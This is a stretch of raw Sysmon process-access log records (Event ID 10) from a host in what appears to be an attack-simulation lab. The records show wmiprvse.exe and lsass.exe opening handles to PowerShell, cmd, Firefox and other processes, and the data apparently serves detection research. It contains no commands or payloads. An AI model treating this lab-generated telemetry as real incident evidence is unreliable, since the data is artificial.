16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 